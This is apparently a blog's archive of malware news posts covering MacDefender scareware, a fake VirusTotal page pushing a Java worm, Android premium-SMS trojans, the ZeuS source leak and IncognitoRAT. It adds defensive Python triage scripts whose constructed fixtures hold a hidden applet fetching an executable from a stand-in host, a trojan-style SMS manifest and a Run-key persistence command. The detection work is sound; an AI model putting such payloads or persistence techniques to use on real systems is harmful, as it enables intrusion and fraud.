Posts Tagged ‘malware’

A picture says a thousand words, and this time we have a video. Here is a quick clip from Internet security firm F-Secure showing how a poisoned Google Image Search result redirects the user to a page that pushes a malware download on Mac OS X.

A recent phishing scam has targeted Mac users by redirecting them from legitimate websites to fake websites which tell them that their computer is infected with a virus. The user is then offered Mac Defender “anti-virus” software to solve the issue.

This “anti-virus” software is malware (malicious software). Its ultimate goal is to obtain the user’s credit card information, which may then be used for fraud.

The most common names for this malware are MacDefender, MacProtector and MacSecurity.

In the coming days, Apple is expected to deliver a Mac OS X software update that will automatically find and remove Mac Defender malware and its known variants.  The update will also help protect users by providing an explicit warning if they download this malware.

In the meantime, the sections below provide step-by-step instructions on how to avoid or manually remove this malware.

How to avoid installing this malware

If any notifications about viruses or security software appear, quit Safari or any other browser that you are using. If a normal attempt at quitting the browser doesn’t work, then Force Quit the browser.

In some cases, your browser may automatically download and launch the installer for this malicious software.  If this happens, cancel the installation process; do not enter your administrator password.  Delete the installer immediately using the steps below.

  1. Go into the Downloads folder or your preferred download location.
  2. Drag the installer to the Trash.
  3. Empty the Trash.

How to remove this malware

If the malware has been installed, we recommend the following actions:

  • Do not provide your credit card information under any circumstances.
  • Use the Removal Steps below.

Removal steps

  • Move or close the Scan Window
  • Go to the Utilities folder in the Applications folder and launch Activity Monitor
  • Choose All Processes from the pop up menu in the upper right corner of the window
  • Under the Process Name column, look for the name of the app and click to select it; common app names include: MacDefender, MacSecurity or MacProtector
  • Click the Quit Process button in the upper left corner of the window and select Quit
  • Quit Activity Monitor application
  • Open the Applications folder
  • Locate the app, e.g. MacDefender, MacSecurity, MacProtector or another of the names above
  • Drag to Trash, and empty Trash

The malware also installs a login item in your account in System Preferences. Removing the login item is not necessary, but you can remove it by following the steps below.

  • Open System Preferences, select Accounts, then Login Items
  • Select the name of the app you removed in the steps above, e.g. MacDefender, MacSecurity, MacProtector
  • Click the minus button

Use the steps in the “How to avoid installing this malware” section above to remove the installer from the download location.
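The manual procedure above can be checked in one pass before and after cleanup. The script below is an added example, not Apple’s code: it looks for the rogue process, the bundle in /Applications, a leftover installer in ~/Downloads and the login item, and only reports, so the user still performs the removal steps themselves. The loginwindow.plist layout it reads is an assumption noted in the code; the `ps` listing and plist in the tests are constructed.

```python
"""Triage for the MacDefender / MacProtector / MacSecurity family.

Added example, not Apple's code.  It mirrors the manual steps above: look
for the rogue app's process, its bundle in /Applications, its installer in
~/Downloads and its login item, and report what it finds without deleting
anything.  Each check takes its input as an argument so it can also be run
over captured data (a saved `ps` listing, a copied plist) on another machine.
"""
import os
import plistlib
import re
import subprocess
import sys

# Names reported for this family in the article.  Matching ignores case,
# spaces and dashes so "Mac Defender", "MacDefender.app" and
# "macdefender.pkg" all hit.
ROGUE_NAMES = ("macdefender", "macprotector", "macsecurity")
INSTALLER_EXT = re.compile(r"\.(pkg|mpkg|zip|dmg)$", re.IGNORECASE)


def is_rogue_name(path):
    """True if the last path component, minus extension, is a known rogue name."""
    base = os.path.basename(path.rstrip("/"))
    base = re.sub(r"\.(app|pkg|mpkg|zip|dmg)$", "", base, flags=re.IGNORECASE)
    return re.sub(r"[\s_-]", "", base).lower() in ROGUE_NAMES


def rogue_processes(ps_output):
    """Parse `ps -axo pid=,comm=` output; return (pid, command) pairs whose
    executable name matches.  On Mac OS X `comm` is the full executable path."""
    hits = []
    for line in ps_output.splitlines():
        pid, _, comm = line.strip().partition(" ")
        comm = comm.strip()
        if pid.isdigit() and comm and is_rogue_name(comm):
            hits.append((int(pid), comm))
    return hits


def rogue_bundles(app_dir):
    """.app bundles in app_dir (normally /Applications) with a rogue name."""
    if not os.path.isdir(app_dir):
        return []
    return sorted(os.path.join(app_dir, e) for e in os.listdir(app_dir)
                  if e.lower().endswith(".app") and is_rogue_name(e))


def rogue_installers(download_dir):
    """Installer archives in the download folder that the browser may have
    auto-opened (steps 1-3 above tell the user to trash these)."""
    if not os.path.isdir(download_dir):
        return []
    return sorted(os.path.join(download_dir, e) for e in os.listdir(download_dir)
                  if INSTALLER_EXT.search(e) and is_rogue_name(e))


def rogue_login_items(plist_bytes):
    """Rogue entries in a loginwindow.plist.

    Assumption (not stated in the article): on Mac OS X 10.5/10.6 the
    per-user login items are stored in ~/Library/Preferences/loginwindow.plist
    under AutoLaunchedApplicationDictionary as a list of dicts with a Path key.
    """
    items = plistlib.loads(plist_bytes).get("AutoLaunchedApplicationDictionary", [])
    return [i["Path"] for i in items
            if isinstance(i, dict) and is_rogue_name(str(i.get("Path", "")))]


def main():
    home = os.path.expanduser("~")
    try:
        ps = subprocess.run(["ps", "-axo", "pid=,comm="], capture_output=True,
                            text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        ps = ""
    findings = {
        "processes": rogue_processes(ps),
        "bundles": rogue_bundles("/Applications"),
        "installers": rogue_installers(os.path.join(home, "Downloads")),
        "login_items": [],
    }
    plist = os.path.join(home, "Library", "Preferences", "loginwindow.plist")
    if os.path.isfile(plist):
        with open(plist, "rb") as fh:
            findings["login_items"] = rogue_login_items(fh.read())
    for kind, hits in findings.items():
        print(f"{kind}: {hits if hits else 'none'}")
    return 1 if any(findings.values()) else 0


if __name__ == "__main__":
    sys.exit(main())
```

Run it as a normal user (no sudo is needed, and the malware asked for an administrator password precisely so it could do more); a non-zero exit means something from the family is still present and the corresponding manual step above has not been completed.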

Kaspersky Lab expert Jorge Mieres has revealed the details of a fake copy of VirusTotal, the popular suspicious-file analysis service run by Hispasec, set up to infect visitors with a worm delivered through Java.

Infection strategies built on Java are very much on the agenda: because of Java’s “hybrid”, cross-platform nature, criminals looking to widen their attack coverage can recruit infected computers regardless of the browser or operating system the victim uses.

In terms of criminal activity, drive-by-download techniques that inject malicious script into legitimate websites are combined with social engineering, which requires users to keep sharpening their sense of “detection”.

“To the user, the website looks the same as the original. However, hidden in the source are the parameters needed to infect the system through a Java applet, which downloads, completely silently, malware detected by Kaspersky Lab as Worm.MSIL.Arcdoor.ov,” Mieres explained in a blog post.

“The worm is developed to recruit zombies that will become part of a botnet designed primarily to perform DDoS attacks: synflood, httpflood, udpflood and icmpflood. The communication is centred on a C&C that stores the information obtained from the victim machine,” he revealed.

Mieres said, “Usually these attacks are run from a centralized hub from which the attacker manages the malicious maneuvers using DDoS framework web applications such as N0ise (used in this case), Cythosia or NOPE. Such applications have a high impact and demand in terms of development, especially from the European zone, Germany.”

Your employees increasingly use their own mobile devices for business, a trend known as the consumerization of IT. Symantec recently conducted a short survey to learn more about end users’ experiences and perspectives on this trend. What it found is that the consumerization of IT has already become a reality for many organizations.

The vast majority of respondents said their company allows employees to use the smartphones of their choice for work-related activities. And nearly identical percentages of respondents said their employer provided them with their smartphone (44 percent) as those who said they purchased their own (43 percent).

The survey also found that while end users realize the productivity and satisfaction benefits of allowing employees to use the smartphones of their choice for work, they don’t fully comprehend the extent of the security challenges this creates. In fact, 78 percent think that allowing employees to use the smartphones of their choice either has no impact on or only somewhat decreases the overall security of their company’s networks and information.

So what can small businesses really learn from this survey? Small businesses need to educate employees on the potential security risks these devices create and how to best keep them and the data on and accessible through them protected. Below are tips for small businesses to share with employees to help keep your information safe:

  • Encrypt the data on mobile devices – The business-related and even personal information stored on mobile devices is often sensitive. Encrypting this data is a must. If a device is lost or stolen, the thief will not be able to read the data if the proper encryption technology is loaded on the device.
  • Make sure all software is up-to-date – Mobile devices must be treated just like PCs in that all software on the devices needs to be kept up-to-date, especially the security software. This will protect the device from new variants of malware and viruses that threaten a company’s critical information.
  • Develop and enforce strong security policies for using mobile devices – In addition to encryption and security updates, it is important to enforce password management and application download policies for managers and employees. Maintaining strong passwords will help protect the data stored in the phone if a device is lost or hacked.
  • Avoid opening unexpected text messages from unknown senders – Just like emails, attackers can use text messages to spread malware, phishing scams and other threats among mobile device users. The same caution should be applied to opening unsolicited text messages that users have become accustomed to with email.
  • Click with caution – Just like on stationary PCs, social networking on mobile devices and laptops needs to be conducted with care and caution. Users shouldn’t open unidentified links, chat with unknown people or visit unfamiliar sites. It doesn’t take much for a user to be tricked into compromising a device and the information on it.
  • Users should be aware of their surroundings when accessing sensitive information – Whether entering passwords or viewing sensitive or confidential data, users should be cautious of who might be looking over their shoulder.
  • Know what to do if a device is lost or stolen – In the case of a loss or theft, employees and management should all know what to do next. Processes to deactivate the device and protect its information from intrusion should all be in place. Products are also available for the automation of such processes, allowing small businesses to breathe easier after such incidents.

Taiwanese security firm AegisLab has found that Android apps published by “zsone” contain malicious code. The apps, which include iBook, iCartoon, iGuide, iCalendar, LoveBaby and Sea Ball, covertly send text messages to three different premium-rate numbers without the user’s knowledge or approval.

At least 11 Android apps contain malware rigged to automatically send text messages from the Google Android smartphone to numbers in China.

So far the malicious behaviour observed by AegisLab only works in China, so if you are located in China it is advisable to check your device for any of zsone’s apps.

Below is the list of apps published by zsone that AegisLab found suspicious (iSMS and iLife are not included; they are still under investigation):

iBook
iCartoon
LoveBaby
3D Cube horror terrible
Sea Ball
iCalendar
iMatch 对对碰
Shake Break
ShakeBanger
iMine
iGuide
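An app that sends SMS behind the user’s back has to declare the permissions for it, so the manifest is the first thing to look at when an app like the ones above comes under suspicion. The script below is an added example, not AegisLab’s code: it reads a decoded AndroidManifest.xml and reports the permission and receiver pattern typical of a premium-rate SMS trojan. The manifest it ships with is constructed (package and class names are made up); a real one is obtained with `apktool d app.apk`, which decodes the binary XML.

```python
"""Triage a decoded AndroidManifest.xml for the permission profile of a
premium-rate SMS trojan like the zsone apps listed above.

Added example, not AegisLab's code.  Sending an SMS from an Android app
requires android.permission.SEND_SMS, and a trojan that wants to hide the
carrier's confirmation or reply messages also asks for RECEIVE_SMS and
registers a high-priority SMS_RECEIVED receiver.  A reading app like
"iBook" has no reason to hold any of these.  The manifest below is
constructed for illustration (package name and class names are made up).
"""
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

SMS_PERMS = {
    "android.permission.SEND_SMS": "can send SMS; premium-rate numbers bill the user",
    "android.permission.RECEIVE_SMS": "can see incoming SMS, e.g. carrier billing confirmations",
    "android.permission.READ_SMS": "can read the stored SMS inbox",
}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"


def parse_manifest(xml_text):
    """Return package, declared permissions and (receiver, actions, priority) triples."""
    root = ET.fromstring(xml_text)
    perms = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}
    receivers = []
    for rcv in root.iter("receiver"):
        for flt in rcv.iter("intent-filter"):
            actions = [a.get(ANDROID + "name") for a in flt.iter("action")]
            prio = int(flt.get(ANDROID + "priority", "0"))
            receivers.append((rcv.get(ANDROID + "name"), actions, prio))
    return {"package": root.get("package"), "permissions": perms, "receivers": receivers}


def sms_findings(manifest):
    """Human-readable reasons this manifest looks like an SMS trojan."""
    out = [f"{p}: {why}" for p, why in SMS_PERMS.items() if p in manifest["permissions"]]
    for name, actions, prio in manifest["receivers"]:
        if SMS_RECEIVED in actions:
            out.append(f"receiver {name} handles SMS_RECEIVED at priority {prio}"
                       + (" (can abort the broadcast before the inbox sees it)" if prio > 0 else ""))
    return out


def risk_level(manifest):
    perms = manifest["permissions"]
    if "android.permission.SEND_SMS" in perms and "android.permission.RECEIVE_SMS" in perms:
        return "high"     # send + intercept: the classic premium-SMS pattern
    if "android.permission.SEND_SMS" in perms:
        return "medium"
    return "low"


# Constructed sample: what a trojanised "reading" app's manifest might declare.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.ibook">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:label="iBook">
    <activity android:name=".ReaderActivity"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    m = parse_manifest(text)
    print(m["package"], "->", risk_level(m))
    for line in sms_findings(m):
        print("  -", line)
```

The permission check is the cheap triage; confirming the premium numbers themselves still means reading the decompiled code for the sendTextMessage call and its destination strings.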

Juniper Networks recently released a report indicating that Android malware is spreading rapidly, with a 400% increase in just six months. While Google controls a “kill switch” to remotely remove malicious apps found on Android phones, it still has no mechanism like Apple’s App Store review to scrutinize apps for malicious code before they land on the Android Market. To contain the spread of such apps, Google needs to take measures to stop them being published on the Android Market in the first place, instead of using the kill switch every time a problem is identified.

Android OS has shaken up the mobile market in many ways. Google’s “open source” platform has already overtaken Apple both in mobile market share and in the number of apps in its app store. However, all is not well with Android. With growing popularity, Android is also becoming a target for malware writers and cyber criminals. According to Juniper Networks’ latest report, the number of malware samples targeting devices running the Android operating system increased 400% between June 2010 and January 2011.

“These findings reflect a perfect storm of users who are either uneducated on or disinterested in security, downloading readily available applications from unknown and unvetted sources in the complete absence of mobile device security solutions,” said Dan Hoffman, chief mobile security evangelist at Juniper Networks.

“Mobile malware attacks and other exploits are no longer just theoretical occurrences discussed by security researchers and vendors keen on cashing in on a projected market. The threats to mobile devices are real — and reach far beyond simple viruses to include malware, loss and theft, data communication interception, exploitation and misconduct, and direct attacks. This report details specific attack vectors on mobile devices over the past year, defines new and emerging mobile threats expected in 2011, and gives mobile users practical advice to protect themselves from malicious attacks,” the report abstract states.

The report notes that there needs to be an increase in diligence by those who approve applications for distribution in the marketplace, as well as more proactive security efforts on the part of consumers.

Other key findings in the Juniper report include:

App store anxiety: The single greatest distribution point for mobile malware is application download, yet the vast majority of smartphone users are not employing an antivirus solution on their mobile device to scan for malware.

Wi-Fi worries: Mobile devices are increasingly susceptible to Wi-Fi attacks, including applications that enable an attacker to easily log into victim email and social networking applications.

The text threat: 17 percent of all reported infections were due to SMS trojans that sent SMS messages to premium rate numbers, often at irretrievable cost to the user or enterprise.

Device loss and theft: 1 in 20 Juniper customer devices were lost or stolen, requiring locate, lock or wipe commands to be issued.

Risky teen behavior: 20 percent of all teens admit sending inappropriate or explicit material from a mobile device.

“Droid Distress”: The number of Android malware attacks increased 400 percent since Summer 2010.

“App store processes of reactively removing applications identified as malicious after they have been installed by thousands of users are insufficient as a means to control malware proliferation. There are specific steps users must take to mitigate mobile attacks. Both enterprises and consumers alike need to be aware of the growing risks associated with the convenience of having the Internet in the palm of your hand,” Hoffman added.

Danish security firm CSIS Security Group has found that the complete source code for the ZeuS botnet crime kit is being distributed on several underground forums as well as through other channels. CSIS has collected several addresses from which the ZeuS source code is being distributed as a compressed zip archive, and says it has downloaded, unzipped and compiled the code to confirm its authenticity. Peter Kruse, Partner & Security Specialist at CSIS, says, “We can hereby confirm that the complete ZeuS/Zbot source code is freely available for inspection, inspiration or perhaps to be compiled and used in future attacks.”

ZeuS/Zbot is already considered one of the most pervasive banking Trojans in the global threat landscape. It is an advanced, highly configurable crime kit. With the leak of the source code, ZeuS/Zbot could easily become even more widespread and an even bigger threat than it is today.

The source code would greatly help security companies analyze how this advanced botnet really works, and could mark a breakthrough for an industry struggling to keep pace with highly advanced malware that is increasingly difficult to detect. However, it also gives other malware writers a head start on advanced virus and botnet development.

Most of today’s malware targets Windows and its applications, because that is where the most victims are (Windows holds over 90% of the consumer operating system market). However, other platforms are becoming more popular every day and are attracting attackers who have started writing malicious code for them.

According to McAfee, a further threat is cross-platform malware that can execute on Windows and Mac using Java: this type of malware runs in the multiplatform Java Virtual Machine. IncognitoRAT is one example of a Java-based Trojan discovered in the wild; it is downloaded and installed by a separate component. It behaves like other Windows botnets but uses source code and libraries that can operate on other platforms.

“The original propagation vector of IncognitoRAT is a Windows executable, but apparently it was created using the tool JarToExe, which includes, among other features, the ability to convert .jar files into .exe files, to add program icons and version information, and to protect and encrypt Java programs. The victim’s machine has to have the Java Runtime Environment installed and must be online,” explains Carlos Castillo, malware researcher at McAfee. As soon as the file is executed, it starts downloading a ZIP file with a pack of Java-based libraries used to perform several remote activities:
  • Java Registry Wrapper: Used to access the Windows Registry and create an entry in Software\Microsoft\Windows\CurrentVersion\Run to execute the malware every time the computer starts
  • Java Remote Control: To view and take remote control (keyboard and mouse) of an infected machine
  • JLayer – MP3 Library: To remotely play an MP3 file on the infected machine
  • RNP-VideoPlayer: To play videos remotely
  • JavaMail: Optional Java package to send stolen information to an email account
  • Freedom for Media Java: Open-source alternative to the official Java Media Framework; used by the malware to watch and record images from a remote webcam

In addition to those libraries, the downloader drops the following .jar components:

  • JavaUpdater.jar: Decrypts the directory (full path) that the malware will create to hold all its components on the infected machine; it implements TripleDES encryption and decryption methods. Finally, the component launches the main malware component, Server.jar, with the usual command for running Java applications on Windows (java -jar %malwarepath%/Server.jar).
  • Server.jar: Runs in the background collecting keystrokes using a DLL designed to hook the keyboard on the infected machine. It also waits for commands from the control server to use the libraries described above and perform other actions, such as sending the captured keystrokes in a text file to an FTP server or an email account, viewing and recording the remote webcam, performing distributed denial-of-service attacks, taking remote control of the machine, etc.

One interesting feature of this botnet, which McAfee could not replicate during its analysis, is its ability to “crash” the system. Apparently it is a fake crash: among the dropped files McAfee found a curious image that may be displayed on the infected machine:
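The persistence described above (a Run-key entry that starts Server.jar through the Java runtime) is easy to triage from a registry export, and the same check catches any other autostart that hands a .jar to java.exe or javaw.exe. The script below is an added example, not McAfee’s code; the .reg text it ships with is constructed and its paths are made up, and the “user-writable directory” heuristic is my own assumption about where such droppers tend to live.

```python
"""Triage Run-key persistence of the kind IncognitoRAT installs.

Added example, not McAfee's code.  The RAT registers itself under
Software\\Microsoft\\Windows\\CurrentVersion\\Run and is started with
`java -jar <path>\\Server.jar`, so a Run entry that hands a .jar to the Java
runtime, especially one living under a user-writable directory, deserves a
look.  Input is a .reg export (regedit and `reg export` write UTF-16); the
sample below is constructed and its paths are made up.
"""
import re
import sys

RUN_KEY_RE = re.compile(r"^\[(HKEY_[^\]]*\\CurrentVersion\\Run(?:Once)?)\]$", re.IGNORECASE)
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"="(?P<data>(?:[^"\\]|\\.)*)"$')
# java.exe / javaw.exe ... -jar, or any .jar mentioned on the command line
JAVA_JAR_RE = re.compile(r"\bjavaw?(?:\.exe)?\b.*?\s-jar\b|\.jar\b", re.IGNORECASE)
# Heuristic (assumption): autostart targets under these trees deserve attention
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Local Settings|Temp|Downloads)\\", re.IGNORECASE)


def _unescape(s):
    r"""Undo .reg escaping left to right: \\ -> \ and \" -> " ."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(reg_text):
    """Return (key, value name, command) for every string value under a Run key."""
    entries, current = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = RUN_KEY_RE.match(line)
            current = m.group(1) if m else None   # only Run / RunOnce keys matter
            continue
        m = VALUE_RE.match(line) if current else None
        if m:
            entries.append((current, _unescape(m.group("name")), _unescape(m.group("data"))))
    return entries


def suspicious_entries(entries):
    """Entries worth a second look, each with the reasons it was flagged."""
    hits = []
    for key, name, cmd in entries:
        reasons = []
        if JAVA_JAR_RE.search(cmd):
            reasons.append("hands a .jar to the Java runtime")
        if USER_WRITABLE_RE.search(cmd):
            reasons.append("target lives in a user-writable directory")
        if reasons:
            hits.append({"key": key, "name": name, "command": cmd, "reasons": reasons})
    return hits


# Constructed sample export: one legitimate entry, one in the RAT's style.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"="\"C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\""
"JavaUpdater"="\"C:\\Program Files\\Java\\jre6\\bin\\javaw.exe\" -jar \"C:\\Users\\alice\\AppData\\Roaming\\jupd\\Server.jar\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
'''


def main(argv):
    if len(argv) > 1:
        with open(argv[1], encoding="utf-16") as fh:   # regedit exports UTF-16
            text = fh.read()
    else:
        text = SAMPLE_REG
    for hit in suspicious_entries(parse_run_entries(text)):
        print(f'{hit["key"]}\\{hit["name"]}: {hit["command"]}')
        for reason in hit["reasons"]:
            print("   -", reason)


if __name__ == "__main__":
    main(sys.argv)
```

Export the keys on the suspect machine with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (and the HKLM equivalent), then run the script against the file; a flagged entry gives the path of the .jar to pull for analysis.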


Google’s top-trending Anglophone search term right now is, understandably, “osama bin laden dead”.

Google officially describes its hotness (you couldn’t make this stuff up) as volcanic.

According to President Obama’s statement, “On Sunday, a ‘small team’ of Americans raided the compound. After a firefight, they killed Bin Laden. Apparently, DNA tests have confirmed Bin Laden’s identity.”

Now you know the basics – but watch out for the links you’re likely to come across in email or on social networking sites offering you additional coverage of this newsworthy event.

“Many of the links you see will be perfectly legitimate links. But at least some are almost certain to be dodgy links, deliberately distributed to trick you into hostile internet territory. If in doubt, leave it out!” warns Paul Ducklin, Sophos’s Head of Technology, Asia Pacific.

Sometimes, poisoned content is rather obvious. The links in the spam below give the impression of going to a news site:

The links don’t go anywhere of the sort, of course. Wherever you click, you end up finding out how to replace your tired old windows:

But even well-meant searches using your favorite search engine might end in tears. What’s commonly called “Black-Hat Search Engine Optimisation” (BH-SEO) means that cybercrooks can often trick the secret search-ranking algorithms of popular search engines by feeding them fake pages to make their rotten content seem legitimate, and to trick you into visiting pages which have your worst interests at heart.

Well-known topics that have been widely written about for years are hard to poison via BH-SEO. The search engines have a good historical sense of which sites are likely to be genuinely relevant if your interest is searches like “Commonwealth of Australia”, “Canadian Pacific Railway” or “Early history of spam”.

But a search term which is incredibly popular but by its very nature brand new – “Japanese tsunami”, “William and Kate engagement”, “Kate Middleton wedding dress” or, of course “Osama bin Laden dead” – doesn’t give the search engines much historical evidence to go on.

Of course, the search engines want to be known for being highly responsive to new trends – that means more advertising revenue for them, after all – and that means, loosely speaking, that they have to take more of a chance on accuracy.

What can you do to keep safe?

* Don’t blindly trust links you see online, whether in emails, on social networking sites, or from searches. If the URL and the subject matter don’t tie up in some obvious way, give it a miss.

* Use an endpoint security product which offers some sort of web filtering so you get early warning of poisoned content.

* If you go to a site expecting to see information on a specific topic but get redirected somewhere unexpected – to a “click here for a free security scan” page, for instance, or to a survey site, or to a “download this codec program to view the video” dialog – then get out of there at once. Don’t click further. You’re being scammed.
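Two of the tricks described on this page can be checked mechanically once you have the HTML of a suspect page in hand: the spam links above, whose visible text names a news site while the href goes elsewhere, and the fake VirusTotal page described earlier, which carried a hidden Java applet in its source. The script below is an added example, not Sophos’s or Kaspersky’s code; both HTML samples are constructed, and the `.example` hostnames in them are made up.

```python
"""Inspect a fetched HTML page for two tricks described on this page.

Added example, not Sophos's or Kaspersky's code.  misleading_links() flags
anchors whose visible text names one site while the href goes to another
(the "URL and subject matter don't tie up" check).  java_plugin_loaders()
flags <applet>/<object>/<embed> elements that load a .jar or the Java
plug-in, noting when they are sized to zero or hidden, which is how a fake
page can carry an applet the visitor never sees.  Samples are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)


class _Collector(HTMLParser):
    """Collects (href, visible text) for anchors and attribute dicts for
    plug-in elements; <param> children are folded into the most recent
    plug-in element's dict under a "param:<name>" key."""

    def __init__(self):
        super().__init__()
        self.links, self.plugins = [], []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "a" and attrs.get("href"):
            self._href, self._text = attrs["href"], []
        elif tag in ("applet", "object", "embed"):
            self.plugins.append((tag, attrs))
        elif tag == "param" and self.plugins:
            self.plugins[-1][1]["param:" + attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def _host(url):
    return (urlparse(url if "//" in url else "//" + url).hostname or "").lower()


def misleading_links(html):
    """Anchors whose visible text names a host that the href does not go to."""
    c = _Collector()
    c.feed(html)
    hits = []
    for href, text in c.links:
        m = DOMAIN_RE.search(text)
        if not m:
            continue                      # text names no site; nothing to compare
        shown, real = m.group(1).lower(), _host(href)
        if real and real != shown and not real.endswith("." + shown):
            hits.append({"text": text, "href": href, "shown_host": shown, "real_host": real})
    return hits


def java_plugin_loaders(html):
    """Plug-in elements that pull a .jar or the Java plug-in, with a hidden flag."""
    c = _Collector()
    c.feed(html)
    hits = []
    for tag, a in c.plugins:
        blob = " ".join(f"{k}={v}" for k, v in a.items()).lower()
        if not (tag == "applet" or ".jar" in blob or "java" in blob):
            continue
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        hits.append({"tag": tag, "hidden": hidden,
                     "archive": a.get("archive") or a.get("param:archive") or a.get("src") or a.get("data"),
                     "code": a.get("code") or a.get("param:code")})
    return hits


# Constructed samples (hostnames under .example are made up).
SAMPLE_SPAM = """<p>Breaking: <a href="http://win-replace-offers.example/go?id=42">cnn.com/2011/bin-laden-dead</a></p>
<p>Official: <a href="http://www.whitehouse.gov/blog">www.whitehouse.gov</a></p>
<p>Video: <a href="http://media.bbc.co.uk/video">bbc.co.uk</a></p>
<p><a href="http://t.example/abc">Click here</a></p>"""

SAMPLE_FAKE_VT = """<html><body><h1>VirusTotal - Free Online Virus, Malware and URL Scanner</h1>
<form action="/file/upload" method="post"><input type="file" name="file"></form>
<applet code="Main.class" archive="update.jar" width="0" height="0">
  <param name="cmd" value="http://payload.example/x.exe">
</applet></body></html>"""

if __name__ == "__main__":
    for hit in misleading_links(SAMPLE_SPAM):
        print("misleading link:", hit)
    for hit in java_plugin_loaders(SAMPLE_FAKE_VT):
        print("java loader:", hit)
```

Feed it the raw HTML (fetched with a non-browser client so nothing executes) rather than what a browser renders; an applet with width and height of zero is exactly what the visitor would never notice on the lookalike page.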

There are few non-sporting events that draw as much attention from all over the world as the wedding of an heir to the British monarchy. When Prince Charles married Diana, television told the story. For the marriage of Prince William and Kate Middleton, the Internet will not only broadcast the images it will also allow us to engage in a global conversation in real-time.

Until the ceremony takes place on April 29 and for a few days after, you’ll probably see the word “wedding” more often than an avid reader of Jane Austen does. Most of the headlines and links featuring “the wedding” will lead to legitimate sites—but some will invariably lead to a variety of scams and malware. This is true when celebrities die, when disaster strikes and you can expect the same when Catherine says “I do” to William.

If you’re actively avoiding the wedding, you’ll avoid most of the risks. But for you royal watchers out there, here are a few tips from F-Secure for avoiding digital wedding crashers:

1. Follow the official site, Twitter, Facebook, Flickr and YouTube pages.

These official sources are going to be your safest sources of information. Of course, users can post links in the comments, so avoid links that users post unless you trust the domain being linked.

2. Search for Royal Wedding news using Google and Bing’s News Filters.

Google has recently changed its algorithm to deliver safer, higher quality results. However, during breaking news rogue sites use the dark arts of search engine optimization to zoom up the search results. This doesn’t happen, however, in Google and Bing’s news sites. Why? The news sites listed there have all been vetted and verified. Click on News, if it is available in your area, and click without worry.

3. Make sure your PC is patched and protected.

Every month, at least, Microsoft, Apple, Adobe and the world’s biggest software makers release updates to their products that plug security holes. These updates are often crucial for your online safety.